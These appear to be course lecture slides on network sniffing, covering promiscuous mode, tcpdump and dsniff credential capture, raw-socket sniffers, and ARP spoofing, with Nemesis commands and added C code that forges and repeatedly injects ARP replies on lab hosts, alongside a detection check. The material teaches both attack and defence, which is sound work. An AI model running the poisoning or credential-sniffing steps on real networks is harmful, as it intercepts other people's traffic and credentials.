Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing


Nov 27, 2014

Sangwook Lee

COM850 Computer Hacking and Security

0x440 Network Sniffing


Table of Contents

• Network Sniffing

• Sniffing Tools

• ARP Spoofing


0X440 NETWORK SNIFFING

What is Network Sniffing?

The act of capturing packets that aren't necessarily meant for public viewing (that is, frames addressed to hosts other than the one capturing them) is called SNIFFING.


Two sniffing flows, depending on the network type

• Non-switched (hub) network environment
  1. Set the NIC to promiscuous mode
  2. Capture packets

• Switched network environment
  1. ARP-spoof the victims so that their traffic is delivered to the attacker's port
  2. Capture packets


Non-switched vs. Switched Network

• The flow of traffic in a non-switched network (cont.)

Note that steps 3 and 4 can occur in either order: the hub repeats the frame to every port, so all nodes see it regardless of which one it was meant for.


Non-switched vs. Switched Network

• The flow of traffic in a non-switched network

  Step 1 Node A transmits a frame to Node C.
  Step 2 The hub repeats this frame out of every active port.
  Step 3 Node B receives the frame and examines the destination address in it. After determining that it is not the intended host, it discards the frame (unless its NIC is in promiscuous mode).
  Step 4 Node C receives the frame and examines the destination address in it. After determining that it is the intended host, it processes the frame further.


Non-switched vs. Switched Network

• The flow of traffic in a switched network (cont.)



Non-switched vs. Switched Network

• The flow of traffic in a switched network

  Step 1 Node A transmits a frame to Node C.
  Step 2 The switch reads the destination MAC address, looks it up in its forwarding (CAM) table, and sends the frame only out of the port on which Node C's MAC was learned. Node B's port never carries it, which is why promiscuous mode alone is not enough here.
  Step 3 Node C receives the frame and examines the destination address. After determining that it is the intended host, it processes the frame further.


Sniffing Non-switched Network

• For a host to be used as a sniffing agent, its NIC must be set to promiscuous mode.

After promiscuous mode is set, the NIC no longer drops frames addressed to other hosts: every frame that reaches the port is passed up to the kernel, and from there to the sniffer.


Sniffing Non-switched Network

• Setting promiscuous mode (Linux; ifconfig is the legacy tool, ip link does the same today)

$ sudo ifconfig eth0 promisc

Check that the PROMISC flag now appears in the interface's flags before starting a capture. tcpdump and libpcap-based tools switch the interface to promiscuous mode themselves unless told not to (tcpdump -p), so this step matters mainly for hand-written raw-socket sniffers.


Packet Capturing Tools

• Sniffers
  – tcpdump
  – dsniff

• Raw socket sniffers
  – raw_tcpsniff
  – pcap_sniff (with libpcap)
  – decode_sniff (with libpcap)


Sniffer: tcpdump

$ sudo tcpdump -X 'ip host <victim IP>'

-X prints each packet in hex and ASCII, which is how cleartext protocol data (Telnet, FTP, HTTP) becomes readable; the filter expression limits the capture to traffic to or from the victim.


Sniffer: dsniff

$ sudo dsniff -n

dsniff watches the captured traffic for cleartext credentials (FTP, Telnet, HTTP, POP and similar protocols) and prints them as it finds them; -n disables reverse DNS lookups so that the sniffer itself does not generate name-resolution traffic.


Raw Socket

• A raw socket is a network socket that lets a program send and receive IP packets directly, without the kernel applying any transport-layer (TCP/UDP) formatting.

• A raw socket is created by using SOCK_RAW as the socket type.

• There are several protocol options: IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP. A PF_INET raw socket opened with one of these receives a copy of every incoming packet of that protocol, IP header included. Creating one needs root (CAP_NET_RAW on Linux). To see whole Ethernet frames, including non-IP traffic such as ARP, a link-layer (PF_PACKET) socket is needed, which is what libpcap uses underneath.

Page 16: Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

0X440 NETWORK SNIFFING

Raw Socket Sniffer: raw_tcpsniff

raw_tcpsniff.c

Page 17: Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

0X440 NETWORK SNIFFING

Raw Socket Sniffer: raw_tcpsniff

$ gcc -o raw_tcpsniff raw_tcpsniff.c

$ sudo ./raw_tcpsniff

Page 18: Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

0X440 NETWORK SNIFFING

Raw Socket Sniffer with Libpcap: pcap_sniff

pcap_sniff.c

Page 19: Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

0X440 NETWORK SNIFFING

Raw Socket Sniffer with Libpcap: pcap_sniff

$ gcc -o pcap_sniff pcap_sniff.c -lpcap

$ sudo ./pcap_sniff

Page 20: Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

0X440 NETWORK SNIFFING

Raw Socket Sniffer with Libpcap: decode_sniff

decode_sniff.c



Raw Socket Sniffer with Libpcap: decode_sniff

$ gcc -o decode_sniff decode_sniff.c -lpcap

$ sudo ./decode_sniff
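What raw_tcpsniff and decode_sniff do between recv() and printf() is take the IP and TCP headers apart. The following is an added example, not the course's raw_tcpsniff.c or decode_sniff.c: a bounds-checked decoder for the Ethernet/IPv4/TCP headers, exercised on a constructed frame (a Telnet segment from 1.1.1.10 to 1.1.1.30 carrying "USER"), with a main() that feeds it from a PF_INET/SOCK_RAW socket the way raw_tcpsniff does (Linux, root or CAP_NET_RAW required). decode_frame() has the shape a libpcap callback would use; struct and function names are this example's own.

```c
/* Added example: bounds-checked IPv4/TCP header decoding for a sniffer.
 * Not the course's raw_tcpsniff.c / decode_sniff.c; names are this example's own. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

struct pkt_info {
    char src_mac[18], dst_mac[18];       /* filled only by decode_frame() */
    char src_ip[16], dst_ip[16];
    unsigned ttl, proto, src_port, dst_port, tcp_flags;
    int ip_csum_ok;
    const uint8_t *payload;
    size_t payload_len;
};

/* RFC 1071 one's-complement sum over the IP header; a valid header sums to 0xFFFF. */
static int ip_checksum_ok(const uint8_t *ip, size_t ihl)
{
    uint32_t sum = 0;
    for (size_t i = 0; i < ihl; i += 2)
        sum += (uint32_t)ip[i] << 8 | ip[i + 1];
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return sum == 0xFFFF;
}

/* Decode an IPv4 packet as delivered by a PF_INET/SOCK_RAW socket (IP header
 * first). Every length field comes from the wire, so each is checked against
 * len before use: a sniffer that trusts them can be crashed or exploited by
 * the very traffic it is watching. Returns 0 on success, -1 if malformed/truncated. */
int decode_ip(const uint8_t *p, size_t len, struct pkt_info *out)
{
    if (len < 20 || (p[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(p[0] & 0x0F) * 4;          /* header length incl. options */
    size_t total = (size_t)p[2] << 8 | p[3];         /* total length field */
    if (ihl < 20 || ihl > len || total < ihl || total > len)
        return -1;
    out->ip_csum_ok = ip_checksum_ok(p, ihl);
    out->ttl = p[8]; out->proto = p[9];
    snprintf(out->src_ip, sizeof out->src_ip, "%u.%u.%u.%u", p[12], p[13], p[14], p[15]);
    snprintf(out->dst_ip, sizeof out->dst_ip, "%u.%u.%u.%u", p[16], p[17], p[18], p[19]);
    out->src_port = out->dst_port = out->tcp_flags = 0;
    out->payload = p + ihl; out->payload_len = total - ihl;
    if (out->proto != IPPROTO_TCP)
        return 0;                                     /* UDP/ICMP: L4 header left as payload */
    const uint8_t *t = p + ihl;
    if (out->payload_len < 20)
        return -1;
    size_t doff = (size_t)(t[12] >> 4) * 4;          /* TCP data offset, options included */
    if (doff < 20 || doff > out->payload_len)
        return -1;
    out->src_port = t[0] << 8 | t[1];
    out->dst_port = t[2] << 8 | t[3];
    out->tcp_flags = t[13];
    out->payload = t + doff; out->payload_len -= doff;
    return 0;
}

/* Decode a whole Ethernet frame, the form libpcap hands to a pcap_handler. */
int decode_frame(const uint8_t *f, size_t len, struct pkt_info *out)
{
    if (len < 14 || (f[12] << 8 | f[13]) != 0x0800)  /* IPv4 only */
        return -1;
    snprintf(out->dst_mac, sizeof out->dst_mac, "%02x:%02x:%02x:%02x:%02x:%02x",
             f[0], f[1], f[2], f[3], f[4], f[5]);
    snprintf(out->src_mac, sizeof out->src_mac, "%02x:%02x:%02x:%02x:%02x:%02x",
             f[6], f[7], f[8], f[9], f[10], f[11]);
    return decode_ip(f + 14, len - 14, out);
}

/* Constructed sample (not a real capture): Telnet segment 1.1.1.10:40000 ->
 * 1.1.1.30:23, PSH|ACK, 4 bytes of payload "USER". IP checksum is valid. */
const uint8_t sample_frame[] = {
    0x00,0x00,0x00,0xCC,0xCC,0xCC, 0x00,0x00,0x00,0xAA,0xAA,0xAA, 0x08,0x00,  /* Ethernet */
    0x45,0x00,0x00,0x2C, 0x00,0x01,0x40,0x00, 0x40,0x06,0x36,0xA2,            /* IPv4 */
    0x01,0x01,0x01,0x0A, 0x01,0x01,0x01,0x1E,
    0x9C,0x40,0x00,0x17, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00,            /* TCP */
    0x50,0x18,0xFF,0xFF, 0x00,0x00,0x00,0x00,
    'U','S','E','R'                                                           /* payload */
};
const size_t sample_frame_len = sizeof sample_frame;

int main(void)
{
    /* Same capture loop as raw_tcpsniff: the kernel hands us a copy of every TCP
     * packet the NIC accepted (other hosts' traffic too once the NIC is promiscuous). */
    int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    if (s < 0) { perror("socket (root or CAP_NET_RAW required)"); return 1; }
    uint8_t buf[65535];
    for (;;) {
        ssize_t n = recv(s, buf, sizeof buf, 0);
        if (n < 0) { perror("recv"); break; }
        struct pkt_info info;
        if (decode_ip(buf, (size_t)n, &info) == 0)
            printf("%s:%u -> %s:%u flags=0x%02x payload=%zu bytes%s\n",
                   info.src_ip, info.src_port, info.dst_ip, info.dst_port,
                   info.tcp_flags, info.payload_len,
                   info.ip_csum_ok ? "" : " (bad IP checksum)");
    }
    close(s);
    return 0;
}
```

The decoder refuses any packet whose IHL, total length or TCP data offset points past the bytes actually captured, and the checksum test tells a sniffer when it is being fed deliberately corrupt headers. Swapping decode_ip() for decode_frame() inside a pcap callback gives the decode_sniff structure.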


Sniffing Switched Networks

• ARP spoofing

One of the basic operations of Ethernet/IP networking is the ARP (Address Resolution Protocol) request/reply exchange. When Node A wants to communicate with Node C, it broadcasts an ARP request asking which MAC address holds C's IP address, and Node C answers with an ARP reply carrying its MAC address. Even in a switched environment this request reaches every port, because it is a broadcast. ARP is stateless: Node A will accept and cache an ARP reply it never asked for. So Node B can craft and send an unsolicited, forged ARP reply to Node A stating that C's IP address is at B's MAC address. Node A updates its ARP cache and from then on unwittingly addresses frames meant for C to B's MAC, and the switch delivers them to B's port. Poisoning C's cache about A in the same way puts both directions of the conversation through B. B then has to forward the traffic on (IP forwarding enabled on B), otherwise the victims' connection simply breaks and the attack is noticed.


Sniffing Switched Network

• ARP spoofing using NEMESIS: lab hosts

  – Attacker (System B): IP 1.1.1.20, MAC 00:00:00:BB:BB:BB
  – Victim1 (System A): IP 1.1.1.10, MAC 00:00:00:AA:AA:AA
  – Victim2 (System C): IP 1.1.1.30, MAC 00:00:00:CC:CC:CC


Sniffing Switched Network

• ARP spoofing using NEMESIS (cont.)

Attacker (System B) → Victim2 (System C): tell C that 1.1.1.10 is at the attacker's MAC

$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.10 -D 1.1.1.30 -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC

Attacker (System B) → Victim1 (System A): tell A that 1.1.1.30 is at the attacker's MAC

$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.30 -D 1.1.1.10 -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA

Flags: -r sends an ARP reply rather than a request, -d names the interface, -S/-D are the sender/target IP addresses in the ARP body, -h/-m the sender/target MAC addresses in the ARP body, and -H/-M the source/destination MAC addresses of the Ethernet frame itself. Both replies are unsolicited; the victims' stacks accept them anyway. Cache entries age out, so the replies have to be resent every few seconds, and the attacker must forward the intercepted packets (IP forwarding on) or the victims lose connectivity.
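The two Nemesis commands above, and the ARP description before them, come down to two 42-byte Ethernet frames. The following added example, which is neither the slides' nor Nemesis's code, builds those frames by hand with the slides' lab addresses, sends them out an interface on Linux via an AF_PACKET socket (root or CAP_NET_RAW required; the interface name is given on the command line), and includes the check a defender runs on the same frames: does an ARP reply claim a known IP address for a MAC other than the one on record. Function names and the resend interval are this example's own.

```c
/* Added example (not from the slides or from Nemesis): the unsolicited ARP
 * replies the two nemesis commands send, built as raw Ethernet frames, plus
 * the arpwatch-style check a defender uses to spot them. Lab addresses are the
 * slides' constructed values. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define ARP_FRAME_LEN 42   /* 14-byte Ethernet header + 28-byte ARP body */

static const uint8_t mac_a[6] = {0x00,0x00,0x00,0xAA,0xAA,0xAA}, ip_a[4] = {1,1,1,10}; /* Victim1 */
static const uint8_t mac_b[6] = {0x00,0x00,0x00,0xBB,0xBB,0xBB};                         /* Attacker */
static const uint8_t mac_c[6] = {0x00,0x00,0x00,0xCC,0xCC,0xCC}, ip_c[4] = {1,1,1,30}; /* Victim2 */

/* Build an ARP reply (opcode 2) claiming "sender_ip is at sender_mac", addressed
 * to target_mac/target_ip. Field for field the same as nemesis -H/-h/-S/-M/-m/-D. */
size_t build_arp_reply(uint8_t *f, const uint8_t *sender_mac, const uint8_t *sender_ip,
                       const uint8_t *target_mac, const uint8_t *target_ip)
{
    memcpy(f + 0, target_mac, 6);        /* Ethernet dst (-M) */
    memcpy(f + 6, sender_mac, 6);        /* Ethernet src (-H) */
    f[12] = 0x08; f[13] = 0x06;          /* EtherType ARP */
    f[14] = 0x00; f[15] = 0x01;          /* HTYPE Ethernet */
    f[16] = 0x08; f[17] = 0x00;          /* PTYPE IPv4 */
    f[18] = 6;    f[19] = 4;             /* HLEN, PLEN */
    f[20] = 0x00; f[21] = 0x02;          /* OPER reply */
    memcpy(f + 22, sender_mac, 6);       /* SHA (-h): the MAC the victim will cache */
    memcpy(f + 28, sender_ip, 4);        /* SPA (-S): the IP being hijacked */
    memcpy(f + 32, target_mac, 6);       /* THA (-m) */
    memcpy(f + 38, target_ip, 4);        /* TPA (-D) */
    return ARP_FRAME_LEN;
}

/* Defender's check: does this frame claim known_ip for a MAC other than known_mac?
 * Returns 1 on conflict, 0 if it is not a reply about known_ip or the claim
 * matches the record, -1 if the frame is not a well-formed Ethernet/IPv4 ARP. */
int arp_claim_conflicts(const uint8_t *f, size_t len,
                        const uint8_t *known_ip, const uint8_t *known_mac)
{
    if (len < ARP_FRAME_LEN || f[12] != 0x08 || f[13] != 0x06) return -1;
    if (f[18] != 6 || f[19] != 4) return -1;
    if (f[21] != 0x02 || memcmp(f + 28, known_ip, 4) != 0) return 0;
    return memcmp(f + 22, known_mac, 6) != 0;
}

static void hexdump(const char *label, const uint8_t *f, size_t len)
{
    printf("%s (%zu bytes):", label, len);
    for (size_t i = 0; i < len; i++) printf("%s%02x", i % 16 ? " " : "\n  ", f[i]);
    putchar('\n');
}

#ifdef __linux__
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

/* Inject one frame on ifname through a link-layer socket (root/CAP_NET_RAW). */
static int send_frame(const char *ifname, const uint8_t *f, size_t len)
{
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
    if (s < 0) return -1;
    struct sockaddr_ll sll;
    memset(&sll, 0, sizeof sll);
    sll.sll_family = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_ARP);
    sll.sll_ifindex = if_nametoindex(ifname);
    sll.sll_halen = 6;
    memcpy(sll.sll_addr, f, 6);          /* destination MAC from the frame */
    ssize_t n = sendto(s, f, len, 0, (struct sockaddr *)&sll, sizeof sll);
    close(s);
    return n == (ssize_t)len ? 0 : -1;
}
#endif

int main(int argc, char **argv)
{
    (void)argc; (void)argv;
    uint8_t to_c[ARP_FRAME_LEN], to_a[ARP_FRAME_LEN];
    build_arp_reply(to_c, mac_b, ip_a, mac_c, ip_c);   /* tell C: 1.1.1.10 is at BB */
    build_arp_reply(to_a, mac_b, ip_c, mac_a, ip_a);   /* tell A: 1.1.1.30 is at BB */
    hexdump("reply to Victim2", to_c, ARP_FRAME_LEN);
    hexdump("reply to Victim1", to_a, ARP_FRAME_LEN);
#ifdef __linux__
    if (argc > 1) {   /* e.g. ./arp_poison eth0 : resend every 2 s, before the caches age out */
        for (;;) {
            if (send_frame(argv[1], to_c, ARP_FRAME_LEN) || send_frame(argv[1], to_a, ARP_FRAME_LEN)) {
                perror("sendto"); return 1;
            }
            sleep(2);
        }
    }
#endif
    return 0;
}
```

Run without arguments it only prints the two frames, which is enough to compare against what tcpdump -e shows while Nemesis is running. arp_claim_conflicts() is the whole of what a passive ARP monitor needs: a table of known IP-to-MAC pairs and an alert whenever a reply disagrees with it.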


Sniffing Switched Network

• ARP spoofing using NEMESIS

ARP cache of Victim1 (System A): after the second reply, 1.1.1.30 maps to 00:00:00:BB:BB:BB

ARP cache of Victim2 (System C): after the first reply, 1.1.1.10 maps to 00:00:00:BB:BB:BB

On either victim, arp -a shows the poisoned entry. The same MAC address listed for two different IP addresses, or a known host's MAC changing without explanation, is the tell-tale sign an ARP monitor alerts on; static ARP entries or switch-side dynamic ARP inspection stop the attack outright.


the end